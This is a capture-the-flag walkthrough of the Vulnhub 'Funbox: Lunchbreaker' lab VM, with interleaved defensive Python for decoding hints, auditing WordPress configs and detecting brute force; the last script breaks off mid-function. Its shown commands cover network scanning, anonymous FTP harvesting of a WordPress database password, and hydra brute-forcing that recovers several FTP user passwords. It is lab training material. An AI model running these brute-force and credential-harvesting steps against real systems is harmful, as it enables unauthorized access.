【Vulnhub Lab】【Funbox: Lunchbreaker】【Easy】【20210522】

1、Environment

Lab page: https://www.vulnhub.com/entry/funbox-lunchbreaker,700/
Download: https://download.vulnhub.com/funbox/FunboxLunchbreaker.ova
Difficulty: Easy
Release date: 22 May 2021
File size: 1.6 GB
Author: 0815R2d2
Series: Funbox
Description: this is a beginner's box that can be opened during a lunch break. It works better in VirtualBox than in VMware.
Time taken: 4+ hours. Nothing technically difficult, it is just very roundabout... back and forth with the same two commands the whole time... but it does offer a few unusual ideas.
Key techniques: FTP operations and password brute-forcing

2、Host discovery and port scanning

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.46   08:00:27:3e:67:06       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.310 seconds (110.82 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.46
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-30 23:04 EST
Nmap scan report for 192.168.56.46
Host is up (0.00060s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0             633 May 22  2021 supers3cr3t
|_drwxr-xr-x    6 1006     1006         4096 May 22  2021 wordpress
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 1d:3d:bf:5a:e1:9f:bb:31:85:34:94:24:cf:0c:04:20 (RSA)
|   256 3b:e1:5c:97:5a:93:1d:9c:d5:02:e5:d8:15:a7:92:ea (ECDSA)
|_  256 d6:f2:e3:da:7e:d7:3f:94:7e:3b:5d:bc:ef:ee:49:63 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:3E:67:06 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms 192.168.56.46

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.09 seconds

3、Accessing the ports

3.1、Port 21 - FTP

  • Judging from the FTP directory listing, uploading a WebShell over FTP may be possible
  • Password brute-forcing may also be an option; see whether a username turns up later

3.1.1、FTP file download

  • Download the files「supers3cr3t」and「.s3cr3t」
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.46                   
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||35135|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        118          4096 May 22  2021 .
drwxr-xr-x    3 0        118          4096 May 22  2021 ..
-rw-r--r--    1 0        0             233 May 22  2021 .s3cr3t
-rw-r--r--    1 0        0             633 May 22  2021 supers3cr3t
drwxr-xr-x    6 1006     1006         4096 May 22  2021 wordpress
226 Directory send OK.
ftp> lcd /root/soft/hack
Local directory now: /root/soft/hack
ftp> get supers3cr3t
local: supers3cr3t remote: supers3cr3t
229 Entering Extended Passive Mode (|||35096|)
150 Opening BINARY mode data connection for supers3cr3t (633 bytes).
100% |**************************************************************|   633      594.38 KiB/s    00:00 ETA
226 Transfer complete.
633 bytes received in 00:00 (209.33 KiB/s)
ftp> get .s3cr3t
229 Entering Extended Passive Mode (|||42850|)
150 Opening BINARY mode data connection for .s3cr3t (233 bytes).
100% |**************************************************************|   233      473.05 KiB/s    00:00 ETA
226 Transfer complete.
233 bytes received in 00:00 (183.20 KiB/s)
ftp> exit
221 Goodbye.
  • Download the「wordpress」folder
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# cd ~/soft/hack
                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# wget -r -np -nH ftp://192.168.56.46/wordpress
--2023-12-01 00:37:23--  ftp://192.168.56.46/wordpress
           => “.listing”
正在连接 192.168.56.46:21... 已连接。
正在以 anonymous 登录 ... 登录成功!
==> SYST ... 完成。   ==> PWD ... 完成。
==> TYPE I ... 完成。 ==> 不需要 CWD。
==> PASV ... 完成。   ==> LIST ... 完成。
......
下载完毕 --2023-12-01 00:37:32--
总用时:9.3s
下载了:1566 个文件,1.9s (21.6 MB/s) 中的 41M

3.1.2、Reading and decoding「supers3cr3t」and「.s3cr3t」

  • Hints obtained (they don't look useful):
    • Look deep into nature and then you will understand everything better.
    • If the radiance of a thousand suns / were to burst at once into the sky / that would be like / the splendor of the Mighty One and I am become Death, the shatterer of worlds
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ls    
supers3cr3t  wordpress
                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat supers3cr3t             
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++.>+++++++++++..----.<<++.>>-------.+..+++++++++++.<<.>>-------.+++++.++++++.-----.<<.>>-.-------------.+++++++++++++++++++.+.---.-------------.<<.>>----.+++++++++++++.----------.<<.>>++++++++++++++++.------------.---.+++++++++.<<.>>+++++++++++.----------.++++++.<<.>>++.--------------.+++..<<.>>+++++++++.-------.----------.+.+++++++++++++.+.+.-------------------.+++++++++++++.----------.<<.>>+.+++++++++++++++++.-----------------.+++++++++++++.+++++++.-----.------------.+.+++++.-------.<<.>>-----.+++.+++++++++++++++..---------------.+++++++++++++.<<++++++++++++++.------------.
                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat supers3cr3t | python ../Brainfuck解码.py    
解码前:++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++.>+++++++++++..----.<<++.>>-------.+..+++++++++++.<<.>>-------.+++++.++++++.-----.<<.>>-.-------------.+++++++++++++++++++.+.---.-------------.<<.>>----.+++++++++++++.----------.<<.>>++++++++++++++++.------------.---.+++++++++.<<.>>+++++++++++.----------.++++++.<<.>>++.--------------.+++..<<.>>+++++++++.-------.----------.+.+++++++++++++.+.+.-------------------.+++++++++++++.----------.<<.>>+.+++++++++++++++++.-----------------.+++++++++++++.+++++++.-----.------------.+.+++++.-------.<<.>>-----.+++.+++++++++++++++..---------------.+++++++++++++.<<++++++++++++++.------------.
解码后:Look deep into nature and then you will understand everything better."
翻  译:深入大自然,你就会更好地理解一切。
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat .s3cr3t                 
SWYgdGhlIHJhZGlhbmNlIG9mIGEgdGhvdXNhbmQgc3VucyAvIHdlcmUgdG8gYnVyc3QgYXQgb25jZSBpbnRvIHRoZSBza3kgLyB0aGF0IHdvdWxkIGJlIGxpa2UgLyB0aGUgc3BsZW5kb3Igb2YgdGhlIE1pZ2h0eSBPbmUgYW5kIEkgYW0gYmVjb21lIERlYXRoLCB0aGUgc2hhdHRlcmVyIG9mIHdvcmxkcw==
                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat .s3cr3t | base64 -d
If the radiance of a thousand suns / were to burst at once into the sky / that would be like / the splendor of the Mighty One and I am become Death, the shatterer of worlds
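The decoder script used above (`Brainfuck解码.py`) is not shown in the write-up. The following is an added example, not the author's script: a minimal Brainfuck interpreter in Python plus a small triage heuristic for recognising Brainfuck in a recovered file. The program string is copied verbatim from `supers3cr3t` above; the function names (`looks_like_brainfuck`, `run_brainfuck`, `decode_supers3cr3t`) and the step limit are my own choices.

```python
"""Minimal Brainfuck interpreter plus a triage heuristic (added example, not the
author's Brainfuck解码.py). Assumed names: looks_like_brainfuck, run_brainfuck,
decode_supers3cr3t."""

# Program text copied verbatim from the supers3cr3t file shown above.
SUPERS3CR3T = "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++.>+++++++++++..----.<<++.>>-------.+..+++++++++++.<<.>>-------.+++++.++++++.-----.<<.>>-.-------------.+++++++++++++++++++.+.---.-------------.<<.>>----.+++++++++++++.----------.<<.>>++++++++++++++++.------------.---.+++++++++.<<.>>+++++++++++.----------.++++++.<<.>>++.--------------.+++..<<.>>+++++++++.-------.----------.+.+++++++++++++.+.+.-------------------.+++++++++++++.----------.<<.>>+.+++++++++++++++++.-----------------.+++++++++++++.+++++++.-----.------------.+.+++++.-------.<<.>>-----.+++.+++++++++++++++..---------------.+++++++++++++.<<++++++++++++++.------------."

BF_OPS = set("+-<>[].,")


def looks_like_brainfuck(text, min_ratio=0.95):
    """Triage heuristic: a blob is 'probably Brainfuck' when nearly every
    non-whitespace character is one of the eight instructions and it loops."""
    stripped = "".join(text.split())
    if not stripped or "[" not in stripped:
        return False
    return sum(c in BF_OPS for c in stripped) / len(stripped) >= min_ratio


def build_jump_table(code):
    """Map every '[' to its matching ']' and back; rejects unbalanced brackets."""
    stack, jumps = [], {}
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return jumps


def run_brainfuck(code, stdin=b"", tape_size=30000, max_steps=5_000_000):
    """Execute a Brainfuck program and return what it printed.

    Cells are 8-bit and wrap; ',' reads from `stdin` (0 at EOF); the step limit
    guards against non-terminating input, which matters when you feed the
    interpreter unknown files during triage."""
    code = "".join(c for c in code if c in BF_OPS)  # ignore comments/newlines
    jumps = build_jump_table(code)
    tape = bytearray(tape_size)
    ptr = pc = steps = 0
    inp = iter(stdin)
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; program may not terminate")
        op = code[pc]
        if op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape pointer ran off the right end")
        elif op == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer ran off the left end")
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":
            tape[ptr] = next(inp, 0)
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1
    return out.decode("latin-1")


def decode_supers3cr3t():
    """Reproduce the decoding step from the write-up."""
    return run_brainfuck(SUPERS3CR3T)


if __name__ == "__main__":
    print("looks like Brainfuck:", looks_like_brainfuck(SUPERS3CR3T))
    print(decode_supers3cr3t())
```

Running the file prints the same sentence the write-up shows, closing quote included. The heuristic is useful before you reach for an interpreter: a file that is 95% `+-<>[].,` with at least one loop is worth decoding, while the step and tape-bound checks keep an unknown blob from hanging or crashing the tool.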

3.1.3、Searching the「wordpress」folder contents

  • Search for database passwords
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧ 
└─# grep -ri -E 'DB_PASSWORD' *
wp-admin/setup-config.php:              define( 'DB_PASSWORD', $pwd );
wp-admin/setup-config.php:                              case 'DB_PASSWORD':
wp-config.php:define( 'DB_PASSWORD', 'JuZhRbNNk.()' );
wp-config-sample.php:define( 'DB_PASSWORD', 'passwort_hier_einfuegen' );
wp-includes/load.php:   $dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : '';
  • Two database user passwords were obtained
    • 10.10.10.12: not a local IP, so a container may be involved
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧ 
└─# cat wp-config.php                           
<?php
......
define( 'DB_NAME', 'wpdb' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'JuZhRbNNk.()' );
define( 'DB_HOST', '10.10.10.12' );
define( 'DB_CHARSET', 'utf8' );
define('DB_COLLATE', '');
......
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧ 
└─# cat wp-config-sample.php
<?php
......
define( 'DB_NAME', 'datenbankname_hier_einfuegen' );
define( 'DB_USER', 'benutzername_hier_einfuegen' );
define( 'DB_PASSWORD', 'passwort_hier_einfuegen' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define('DB_COLLATE', '');
......
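The grep above is the manual version of a check worth automating: anything readable over an anonymous share (or committed to a repository) should be scanned for configuration files whose credentials are real rather than sample placeholders. The following is an added example, not part of the original write-up or of WordPress: it parses the `define()` lines of a WordPress config, tells literal values apart from the placeholder strings in `wp-config-sample.php`, and flags a `DB_HOST` that is not the local machine. The two config excerpts are the ones shown above; `extract_defines`, `is_placeholder`, `audit_wp_config` and the placeholder marker list are my own names and heuristics.

```python
"""Audit WordPress config defines for exposed credentials (added example, not the
project's own tooling). Assumed names: extract_defines, is_placeholder,
audit_wp_config; the placeholder markers are a heuristic."""
import re

# Excerpts of the two files retrieved over anonymous FTP above (values as shown on the page).
WP_CONFIG_LIVE = """<?php
define( 'DB_NAME', 'wpdb' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'JuZhRbNNk.()' );
define( 'DB_HOST', '10.10.10.12' );
define( 'DB_CHARSET', 'utf8' );
define('DB_COLLATE', '');
"""

WP_CONFIG_SAMPLE = """<?php
define( 'DB_NAME', 'datenbankname_hier_einfuegen' );
define( 'DB_USER', 'benutzername_hier_einfuegen' );
define( 'DB_PASSWORD', 'passwort_hier_einfuegen' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define('DB_COLLATE', '');
"""

# Matches define( 'KEY', 'literal' ) as well as define( 'KEY', $expr ) as seen in
# wp-admin/setup-config.php. Escaped quotes inside values are not handled.
DEFINE_RE = re.compile(
    r"""define\(\s*(['"])(?P<key>[A-Za-z_][A-Za-z0-9_]*)\1\s*,\s*"""
    r"""(?:(?P<q>['"])(?P<val>.*?)(?P=q)|(?P<expr>[^'")][^)]*?))\s*\)""",
    re.DOTALL,
)

# Substrings that mark sample/placeholder values (English and German WordPress samples).
PLACEHOLDER_MARKERS = ("_here", "hier_einfuegen", "your_", "put your", "changeme")
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def extract_defines(text):
    """Return {KEY: (value, is_literal)} for every define() in a PHP config."""
    found = {}
    for m in DEFINE_RE.finditer(text):
        if m.group("val") is not None:
            found[m.group("key")] = (m.group("val"), True)
        else:
            found[m.group("key")] = (m.group("expr").strip(), False)
    return found


def is_placeholder(value):
    """Heuristic: empty values and the well-known sample strings are placeholders."""
    v = value.strip().lower()
    return v == "" or any(marker in v for marker in PLACEHOLDER_MARKERS)


def audit_wp_config(text):
    """List the findings a defender cares about: literal credentials in a readable
    file, and a database host that is not the local machine."""
    defs = extract_defines(text)
    findings = []
    for key in ("DB_USER", "DB_PASSWORD"):
        if key in defs:
            value, literal = defs[key]
            if literal and not is_placeholder(value):
                findings.append(f"{key}: literal credential present (length {len(value)})")
    host, _ = defs.get("DB_HOST", ("", True))
    # WordPress accepts host:port, so compare the host part as well as the whole string.
    if host and host not in LOCAL_HOSTS and host.split(":")[0] not in LOCAL_HOSTS:
        findings.append(f"DB_HOST: database at {host} is not local; a separate host or container is implied")
    return findings


if __name__ == "__main__":
    for name, text in (("wp-config.php", WP_CONFIG_LIVE), ("wp-config-sample.php", WP_CONFIG_SAMPLE)):
        print(name, audit_wp_config(text) or ["no findings"])
```

The live config yields three findings (user, password, non-local host) and the sample file none, which is exactly the distinction the grep output above leaves you to make by eye. The password value itself is reported only by length so the audit log does not become a second copy of the secret.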

3.2、Port 22 - SSH

  • Initial login attempt to see whether there is any usable hint
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧ 
└─# ssh 192.168.56.46    
The authenticity of host '192.168.56.46 (192.168.56.46)' can't be established.
ED25519 key fingerprint is SHA256:A887jwxDkjOcXiGyfxtQS9gU3vV0CwSl3h7KaSGiOjY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.46' (ED25519) to the list of known hosts.
root@192.168.56.46's password:

3.3、Port 80 - Web

  • Two pieces of information obtained
  • Background image: possibly steganography, but low priority; if no other clues turn up, come back and analyze the image
<!-- webdesign by j.miller [[email protected]] -->

4、Directory scanning

  • The directory names in robots.txt are interesting:
    • dirb, gobuster: both are directory scanning tools
    • etc: the directory where Linux system configuration files live
    • WYSIWYG: what you see is what you get
# Small base wordlist, initial reconnaissance scan
dirb http://192.168.56.46
# More thorough (conda activate py37)
dirsearch -u http://192.168.56.46 -t 64 -e *
# More thorough still (conda activate py39)
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.46 -lcf
  • http://192.168.56.46/index.html
  • http://192.168.56.46/robots.txt

[Image 1]

4.1、Scanning the「robots」directories (squeaky clean, nothing at all...)

  • So that is what "what you see is what you get" meant: it is telling us not to bother with directory scanning...
  • But without scanning it yourself, who knows whether it is just a distraction. (╯°□°)╯︵┻━┻
gobuster dir -u http://192.168.56.46/dirb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/etc -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/WYSIWYG -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q

5、Fine, let's start analyzing the image...

  • Download the image
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# wget http://192.168.56.46/image.jpg    
--2023-12-01 02:17:30--  http://192.168.56.46/image.jpg
正在连接 192.168.56.46:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:7053571 (6.7M) [image/jpeg]
正在保存至: “image.jpg”

image.jpg                  100%[=======================================>]   6.73M  --.-KB/s  用时 0.07s   

2023-12-01 02:17:30 (99.5 MB/s) - 已保存 “image.jpg” [7053571/7053571])

5.1、Local image analysis

5.1.1、steghide analysis (failed)

  • View the image info (it turns out to be passphrase-protected)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# steghide info image.jpg 
"image.jpg":
  format: jpeg
  capacity: 376.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
steghide: could not extract any data with that passphrase!
  • First passphrase brute-force (failed)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# stegseek image.jpg /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.59% (132.9 MB)           
[!] error: Could not find a valid passphrase.
  • Second attempt, seed brute-force (failed)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# stegseek --seed image.jpg 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.99% (4294720000 seeds)           
[!] error: Could not find a valid seed.

5.1.2、binwalk analysis (failed)

  • Extract embedded files (failed)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# binwalk -e image.jpg --run-as=root 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, EXIF standard
12            0xC             TIFF image data, little-endian offset of first image directory: 8
8566          0x2176          Copyright string: "Copyright (c) 1998 Hewlett-Packard Company"

                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ls
image.jpg  reports  supers3cr3t  wordpress

5.1.3、foremost analysis (failed)

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# foremost image.jpg                           
Processing: image.jpg
|*|
                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# tree -a output                 
output
├── audit.txt
└── jpg
    └── 00000000.jpg

2 directories, 2 files

5.2、Online image analysis (likewise, nothing found)

StegOnline

6、SSH password brute-force (FTP brute-force run in parallel)

  • For now there is no more information to work with; the only lead left is a possible username, jane
  • If that still fails, the only option is to switch to different wordlists and redo the directory scanning and password brute-forcing
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# hydra -l jane -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 02:46:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.56.46:22/
[STATUS] 378.00 tries/min, 378 tries in 00:01h, 14344056 to do in 632:28h, 29 active
[STATUS] 218.00 tries/min, 654 tries in 00:03h, 14343785 to do in 1096:38h, 24 active
...... failed, no password found

7、FTP password brute-force

  • Password found: login: jane password: password
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# hydra -l jane -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 02:56:18
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46   login: jane   password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 02:56:24

7.1、Downloading files

  • The current FTP directory layout looks like a Linux user's home directory under /home
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jane
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||57051|)
150 Here comes the directory listing.
dr-x------    3 1002     1002         4096 May 22  2021 .
drwxr-xr-x    6 0        0            4096 May 22  2021 ..
-rw-r--r--    1 1002     1002          220 May 22  2021 .bash_logout
-rw-r--r--    1 1002     1002         3771 May 22  2021 .bashrc
-rw-r--r--    1 1002     1002          807 May 22  2021 .profile
drwxr-xr-x    2 1002     1002         4096 May 22  2021 backups
226 Directory send OK.
ftp> cd backups
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||44799|)
150 Here comes the directory listing.
drwxr-xr-x    2 1002     1002         4096 May 22  2021 .
dr-x------    3 1002     1002         4096 May 22  2021 ..
-rw-r--r--    1 1002     1002           59 May 22  2021 keys.txt
226 Directory send OK.
ftp> get keys.txt
local: keys.txt remote: keys.txt
229 Entering Extended Passive Mode (|||19248|)
150 Opening BINARY mode data connection for keys.txt (59 bytes).
100% |*********************************************************|    59        0.98 MiB/s    00:00 ETA
226 Transfer complete.
59 bytes received in 00:00 (45.72 KiB/s)
  • No idea yet what this keys.txt is for; probably some kind of password
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat keys.txt  
kJGgh-kiu65-zghku-76zzt-hgf56
llij8-fgzZ-rTzU1-ddfgz-i876S

7.2、It looks like /home; verify

  • Sure enough... it is
ftp> ls -al
229 Entering Extended Passive Mode (|||32072|)
150 Here comes the directory listing.
dr-x------    3 1002     1002         4096 May 22  2021 .
drwxr-xr-x    6 0        0            4096 May 22  2021 ..
-rw-r--r--    1 1002     1002          220 May 22  2021 .bash_logout
-rw-r--r--    1 1002     1002         3771 May 22  2021 .bashrc
-rw-r--r--    1 1002     1002          807 May 22  2021 .profile
drwxr-xr-x    2 1002     1002         4096 May 22  2021 backups
226 Directory send OK.
ftp> pwd
Remote directory: /home/jane
ftp> cd ../
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||16839|)
150 Here comes the directory listing.
drwxr-xr-x    6 0        0            4096 May 22  2021 .
drwxr-xr-x   20 0        0            4096 May 22  2021 ..
dr-x------    3 1002     1002         4096 May 22  2021 jane
dr-x------    3 1001     1001         4096 May 22  2021 jim
dr-x------    4 1000     1000         4096 May 22  2021 john
drwx------    4 1003     1003         4096 May 22  2021 jules
226 Directory send OK.

7.3、Information gathering as jane

  • Nothing much; we only learn that there are four users: jane, jim, john, jules
ftp> cd jim
550 Failed to change directory.
ftp> cd john
550 Failed to change directory.
ftp> cd jules
550 Failed to change directory.

7.4、FTP access is limited; try brute-forcing the other three users' passwords

  • login: jane password: password
  • login: jim password: 12345
  • john: brute-force failed
  • login: jules password: sexylady
# Brute-forcing them all together like this is not recommended: if one of them can't be cracked, you wait a very long time
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat user  
jane
jim
john
jules

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# hydra -L user -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 03:34:43
[DATA] max 64 tasks per 1 server, overall 64 tasks, 57377596 login tries (l:4/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46   login: jane   password: password
[21][ftp] host: 192.168.56.46   login: jim   password: 12345
......(For a long, long time)
[21][ftp] host: 192.168.56.46   login: jules   password: sexylady
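Seen from the target, the hydra runs in sections 6, 7 and 7.4 leave a very recognisable trace: dozens of `FAIL LOGIN` entries from one client in `vsftpd.log`, or `Failed password` lines in sshd's auth log, followed by an `OK LOGIN` or `Accepted password` from the same address. The following is an added example, not from the original page: a Python detector that normalises both log formats, counts failures per source address inside a sliding window, distinguishes a single-user brute force from a multi-user spray, and flags a success that lands on top of such a burst. The log lines are constructed in the shape of vsftpd and OpenSSH output (vsftpd may log the client as `::ffff:a.b.c.d`, which is handled); the 10-in-60-seconds threshold and the function names are my own choices.

```python
"""Brute-force / password-spray detection over vsftpd and sshd logs (added example,
not from the page). The sample log lines are constructed; thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample logs shaped like vsftpd.log and sshd auth.log entries.
# 20 failed jane logins within a few seconds, then a success (what a hydra hit looks like).
VSFTPD_LOG = [
    f'Fri Dec  1 02:56:{18 + i // 4:02d} 2023 [pid {1000 + i}] [jane] FAIL LOGIN: Client "::ffff:192.168.56.3"'
    for i in range(20)
] + ['Fri Dec  1 02:56:24 2023 [pid 1020] [jane] OK LOGIN: Client "::ffff:192.168.56.3"']

# 15 failures cycling through five usernames from one source (a spray), plus one
# unrelated successful login from another address.
SSHD_LOG = [
    f"Dec  1 02:46:{21 + i // 5:02d} funbox8 sshd[{2000 + i}]: Failed password for {u} from 192.168.56.3 port {50000 + i} ssh2"
    for i, u in enumerate(["jane", "jim", "john", "jules", "root"] * 3)
] + ["Dec  1 02:50:10 funbox8 sshd[2100]: Accepted password for jane from 192.168.56.10 port 50200 ssh2"]

VSFTPD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(?P<user>[^\]]*)\] '
    r'(?P<result>OK|FAIL) LOGIN: Client "(?P<src>[^"]+)"'
)
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Accepted|Failed) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def plain_ip(src):
    """vsftpd logs IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d); normalise that."""
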